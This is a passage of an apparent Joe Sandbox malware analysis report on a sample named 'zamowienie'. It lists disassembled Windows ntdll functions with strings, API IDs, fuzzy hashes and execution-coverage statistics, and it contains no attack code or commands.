                                                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 34F682D7
                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 34F682E8
                                                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 34F682DE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                              • API String ID: 3446177414-1783798831
                                                                                                                                              • Opcode ID: c8f2b3a0f1371067da2179eebdc60f9b70e741697d72df0a9c5895332a767acf
                                                                                                                                              • Instruction ID: 6fd1fbf4cfe273a25d3ea14d18092c54b6a5e87127147025f0eb761cd97cffdc
                                                                                                                                              • Opcode Fuzzy Hash: c8f2b3a0f1371067da2179eebdc60f9b70e741697d72df0a9c5895332a767acf
                                                                                                                                              • Instruction Fuzzy Hash: 1041F0BA521304EFE720DB64D840B5B77E8EF49750F484D2AF884E7290E775D8428B95
                                                                                                                                              Function 34F2BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              • RTL: Re-Waiting, xrefs: 34F67BAC
                                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 34F67B7F
                                                                                                                                              • RTL: Resource at %p, xrefs: 34F67B8E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                              • API String ID: 0-871070163
                                                                                                                                              • Opcode ID: f7d5af85e40d5c5b4aa8c8017db98b6b0330f4051b886be0655a929084604b95
                                                                                                                                              • Instruction ID: d0441919621a12c50e0d04ea9ae8ba6cf65be59ab13d110b208a4a8657dbf5b5
                                                                                                                                              • Opcode Fuzzy Hash: f7d5af85e40d5c5b4aa8c8017db98b6b0330f4051b886be0655a929084604b95
                                                                                                                                              • Instruction Fuzzy Hash: DE41D0397057029FE714CE25C940B5AB7E9FF88721F180E1DE95A9B680DB31E8078F91
                                                                                                                                              Function 34F2B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 34F6728C
                                                                                                                                              Strings
                                                                                                                                              • RTL: Re-Waiting, xrefs: 34F672C1
                                                                                                                                              • RTL: Resource at %p, xrefs: 34F672A3
                                                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 34F67294
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                              • API String ID: 885266447-605551621
                                                                                                                                              • Opcode ID: 16a20e33b91b176d53d25063a4dbb64b5a5b3d9b41419187c257e901e4a47254
                                                                                                                                              • Instruction ID: 6a9cd8875771c6dd99c814dbaea0a0c75ed7e43ecc235c77646ec4a3ee393a30
                                                                                                                                              • Opcode Fuzzy Hash: 16a20e33b91b176d53d25063a4dbb64b5a5b3d9b41419187c257e901e4a47254
                                                                                                                                              • Instruction Fuzzy Hash: D841CE3A600606AFE710CE25CC81B5AB7E5FF44764F180E19FD55AB280DB25E8478BD1
                                                                                                                                              Function 34F74755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 34F74899
                                                                                                                                              • LdrpCheckRedirection, xrefs: 34F7488F
                                                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 34F74888
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                              • API String ID: 3446177414-3154609507
                                                                                                                                              • Opcode ID: eefe3ea9d160169f0ba13053621ab93d911762053cc78e1847bc4b6549e3fdfc
                                                                                                                                              • Instruction ID: b2986cbdbf1c925536d69d2a52dbaec03584ee844a40e522a5f65859b1049389
                                                                                                                                              • Opcode Fuzzy Hash: eefe3ea9d160169f0ba13053621ab93d911762053cc78e1847bc4b6549e3fdfc
                                                                                                                                              • Instruction Fuzzy Hash: CE41AD76A04B55DFDB11CF68D940A167FE8EF896D0F090A6EECD8A7211D738D802CB91
                                                                                                                                              Function 34FA2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                              • String ID: %%%u$]:%u
                                                                                                                                              • API String ID: 48624451-3050659472
                                                                                                                                              • Opcode ID: 7e01bf24f44463d4c460a06864527c2a6209330ea70f6d969e3e924188327ebf
                                                                                                                                              • Instruction ID: 60c2ef2377f547bae18c021217f0c6c675f569ec917918a5ce744b76b6c25106
                                                                                                                                              • Opcode Fuzzy Hash: 7e01bf24f44463d4c460a06864527c2a6209330ea70f6d969e3e924188327ebf
                                                                                                                                              • Instruction Fuzzy Hash: 92315476A006199FDB10CF29DC40BEE77F8EF45650F894959E849E3240EB30DA568FA1
                                                                                                                                              Function 34F75F10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: Wow64 Emulation Layer
                                                                                                                                              • API String ID: 3446177414-921169906
                                                                                                                                              • Opcode ID: 286f5068d01d65d179ea2c40820cd2a1b6b748d8d951514c48170e5ca38af024
                                                                                                                                              • Instruction ID: 7db9fc731cc124cd067c14555a0ae8718b236c917dd84aad660e041be091dde8
                                                                                                                                              • Opcode Fuzzy Hash: 286f5068d01d65d179ea2c40820cd2a1b6b748d8d951514c48170e5ca38af024
                                                                                                                                              • Instruction Fuzzy Hash: A1211DB590015DFFEB019AA09D84CFFBB7DEF842D9B084459FA05A2140D6349E06AF74
                                                                                                                                              Function 34FC7CD6 Relevance: 6.4, APIs: 4, Instructions: 397timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3446177414-0
                                                                                                                                              • Opcode ID: 15f0109e21ec430adc5367218e1c45536b2a5450d3720c11750736c823eab50c
                                                                                                                                              • Instruction ID: 2c24c097752892ccc45000f3f8d086e1479415d37c063e1e379b768703f39a60
                                                                                                                                              • Opcode Fuzzy Hash: 15f0109e21ec430adc5367218e1c45536b2a5450d3720c11750736c823eab50c
                                                                                                                                              • Instruction Fuzzy Hash: D3E15171A4030AEFEB14CFA4C881BEEBBF5BF44355F14852AE515A7280D770AA46CB50
                                                                                                                                              Function 34F1EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0c7a6e71f869371bb86641a6c50cc666f84828ef4581e7f86195dc410b214d5b
                                                                                                                                              • Instruction ID: 56ff47783d6e5d2eb8e30280157c012bcfdb8a35f32f63b7b60d11e564a650c3
                                                                                                                                              • Opcode Fuzzy Hash: 0c7a6e71f869371bb86641a6c50cc666f84828ef4581e7f86195dc410b214d5b
                                                                                                                                              • Instruction Fuzzy Hash: 7BE10575E00708DFEB25CFA9C980A8DBBF5FF48354F28496AE545A7261D770A942CF20
                                                                                                                                              Function 34F6EF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3446177414-0
                                                                                                                                              • Opcode ID: ebf63155e2cf62710e8c2aaa1ca4c0638c5fd2e354d90f9e64dea2443400dcf5
                                                                                                                                              • Instruction ID: 3e088f2d3e83159e22099a22cb09b832d21d63c523d91d13f4f4d2ef111cc319
                                                                                                                                              • Opcode Fuzzy Hash: ebf63155e2cf62710e8c2aaa1ca4c0638c5fd2e354d90f9e64dea2443400dcf5
                                                                                                                                              • Instruction Fuzzy Hash: 93712876E002199FEF01CFA4D980ADDBBB5BF48358F184429E906EB255D7389906CFA4
                                                                                                                                              Function 34FCA4CA Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3446177414-0
                                                                                                                                              • Opcode ID: 2aac62f996a0b1b24be72f2722ebb5072dff01dd3056b57483b46d20d5e26080
                                                                                                                                              • Instruction ID: 1ffe10a5aae87f5328e67b05d1d91364dc70558355762d690f248135fcec3533
                                                                                                                                              • Opcode Fuzzy Hash: 2aac62f996a0b1b24be72f2722ebb5072dff01dd3056b57483b46d20d5e26080
                                                                                                                                              • Instruction Fuzzy Hash: 63515879B006139FEB08CE18C8A4B1977E5FB88350B188A6DD906DB714DB75FC42DB80
                                                                                                                                              Function 34F6F1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3446177414-0
                                                                                                                                              • Opcode ID: f10a31c70adebd3ada39417687a462b56bbde8d653f9711c10c9a6a0703378f0
                                                                                                                                              • Instruction ID: 33dc3e39b201f72d1760734d9dc6dfe5ab0b56926f5e26ab444211735371f008
                                                                                                                                              • Opcode Fuzzy Hash: f10a31c70adebd3ada39417687a462b56bbde8d653f9711c10c9a6a0703378f0
                                                                                                                                              • Instruction Fuzzy Hash: C55134B6E002199FEF04CF98D841ACDBBB1FF48359F18852AE816B7254D7389942CF64
                                                                                                                                              Function 34F27B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4281723722-0
                                                                                                                                              • Opcode ID: 851d25281fb580f4b31c8b5aef913d091511a7231bac11a9bd3963f2c284ee6d
                                                                                                                                              • Instruction ID: 67ef027a67a651e8f9412c022395a67e1e46d181da8135d0713542d03f3c354e
                                                                                                                                              • Opcode Fuzzy Hash: 851d25281fb580f4b31c8b5aef913d091511a7231bac11a9bd3963f2c284ee6d
                                                                                                                                              • Instruction Fuzzy Hash: C7314675E10628EFDF00DFA8D844A9DBBB0FB48721F18452AE411B7290CB359942CF98
                                                                                                                                              Function 34EF59C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @
                                                                                                                                              • API String ID: 0-2766056989
                                                                                                                                              • Opcode ID: 3178185268dd22099613e0e3212c43f1badede4e290e49bf07e11ec524ce8b69
                                                                                                                                              • Instruction ID: 47e10fa1f30177af98728c233f7330955cee6d90f1938bb1e0579690c9e396f9
                                                                                                                                              • Opcode Fuzzy Hash: 3178185268dd22099613e0e3212c43f1badede4e290e49bf07e11ec524ce8b69
                                                                                                                                              • Instruction Fuzzy Hash: 79326670E00369DFEB21CF64CC84BD9BBB4BB08304F0584E9D458A7252EB769A85CF91
                                                                                                                                              Function 34F37D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                              • String ID: +$-
                                                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                              • Instruction ID: 33fd02e2fc6bc2b10f7e6e47faeb597e3b73417d8ce1dc28dd215f0903d0e8b5
                                                                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                              • Instruction Fuzzy Hash: 1C91A8B5E022159FEB10CF65C8806AEB7E5BF44760F58CD1AF855E72C0D73499828F60
                                                                                                                                              Function 34F24C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0$Flst
                                                                                                                                              • API String ID: 0-758220159
                                                                                                                                              • Opcode ID: 016134a757342aae64b94180360ca8505920cf9914e97f9f9c2c5bfd4a6deed2
                                                                                                                                              • Instruction ID: 6604d1d48c26deb9a7411083f2f27e9adaad3f589319b2e55d562c8ece482468
                                                                                                                                              • Opcode Fuzzy Hash: 016134a757342aae64b94180360ca8505920cf9914e97f9f9c2c5bfd4a6deed2
                                                                                                                                              • Instruction Fuzzy Hash: 3351C1B9E00A15DFEB14CF98C48465DFBF5EF44798F58882ED0499B250EBB09986CB80
                                                                                                                                              Function 34EF04E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 34EF063D
                                                                                                                                              • kLsE, xrefs: 34EF0540
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                              • API String ID: 3446177414-2547482624
                                                                                                                                              • Opcode ID: 8a4b6f4a8f97ef855f988218a38adffa8250c233ebf500b14fa3caceaf5173d9
                                                                                                                                              • Instruction ID: 0e0322423404b5e895442c5d4cb7c89b7762ba79327d54af293ad923e5f32482
                                                                                                                                              • Opcode Fuzzy Hash: 8a4b6f4a8f97ef855f988218a38adffa8250c233ebf500b14fa3caceaf5173d9
                                                                                                                                              • Instruction Fuzzy Hash: 6C51CEB5514742CFD324DF64C9406A3B7E4AF8930AF028C3EE9A997640E772E545CF92
                                                                                                                                              Function 34EEDF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: 0$0
                                                                                                                                              • API String ID: 3446177414-203156872
                                                                                                                                              • Opcode ID: 7e1fffc817553348221d59dc80f50550b0157faf5e303606452b264375381d18
                                                                                                                                              • Instruction ID: 6372b13b8db00026ae18397e7a67cc917eb69776bee5b4e4936de88cfb0ffebf
                                                                                                                                              • Opcode Fuzzy Hash: 7e1fffc817553348221d59dc80f50550b0157faf5e303606452b264375381d18
                                                                                                                                              • Instruction Fuzzy Hash: 41415BB56087069FD300CF68C584A1ABBE9BF88358F04492EF888DB341D771E946CF96

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:2.5%
                                                                                                                                              Dynamic/Decrypted Code Coverage:4.2%
                                                                                                                                              Signature Coverage:0.7%
                                                                                                                                              Total number of Nodes:455
                                                                                                                                              Total number of Limit Nodes:75
